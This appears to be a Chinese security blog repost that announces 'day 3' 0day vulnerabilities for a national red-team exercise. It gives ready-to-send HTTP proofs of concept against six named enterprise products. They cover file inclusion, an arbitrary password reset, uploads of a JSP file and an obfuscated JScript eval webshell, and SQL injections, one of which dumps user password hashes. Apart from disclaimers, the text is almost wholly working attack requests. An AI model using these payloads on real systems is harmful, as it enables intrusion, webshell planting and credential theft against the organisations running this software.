免责声明
月落星沉研究室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!
0x00前言
hvv第三弹
0x01漏洞一
泛微 Weaver E-Office9 前台文件包含
http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls0x02漏洞二
网神 SecSSL 3600安全接入网关系统 任意密码修改
POC:
POST /changepass.php?type=2Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}old_pass=&password=Test123!@&repassword=Test123!@
0x03漏洞三
用友 移动管理系统 uploadApk.do 任意文件上传漏洞
POC:
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1Host:xxx.xxx.xxx.xxxContent-Type:multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3User-Agent:Mozilla/5.0(Macintosh; Intel Mac OS X10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.0.0Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im age/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cookie:JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.serverConnection:close ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3Content-Disposition:form-data;name="downloadpath"; filename="a.jsp"Content-Type:application/mswordhello ------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
0x04漏洞四
用友时空KSOA PayBill SQL注入漏洞
POC:
POST/servlet/PayBill?caculate&_rnd=HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 134Accept-Encoding: gzip, deflateConnection: close<root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>
0x05漏洞五
广联达后台文件上传
POC:
POST/gtp/im/services/group/msgbroadcastuploadfile.aspxHTTP/1.1Host: 10.10.10.1:8888X-Requested-With: Ext.basexAccept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: zh-Hans-CN,zh-Hans;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELjAccept: */*Origin: http://10.10.10.1Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40Cookie:Connection: closeContent-Length: 421------WebKitFormBoundaryFfJZ4PlAZBixjELjContent-Disposition: form-data; filename="1.aspx";filename="1.jpg"Content-Type: application/text<%@ Page Language="Jscript"Debug=true%><%varFRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';varGFMA=Request.Form("qmq1");varONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);eval(GFMA, ONOQ);%>------WebKitFormBoundaryFfJZ4PlAZBixjELj--
0x06漏洞六
广联达OAsql注入
POC:
POST/Webservice/IM/Config/ConfigService.asmx/GetIMDictionaryHTTP/1.1Host: xxx.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 88dasdas=&key=1' UNION ALLSELECTtop1812concat(F_CODE,':',F_PWD_MD5)fromT_ORG_USER--
这是我们手上掌握的部分漏洞,还有更多漏洞将在后面曝光,
原文始发于微信公众号(月落安全):国护0day漏洞消息同步(Day3)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论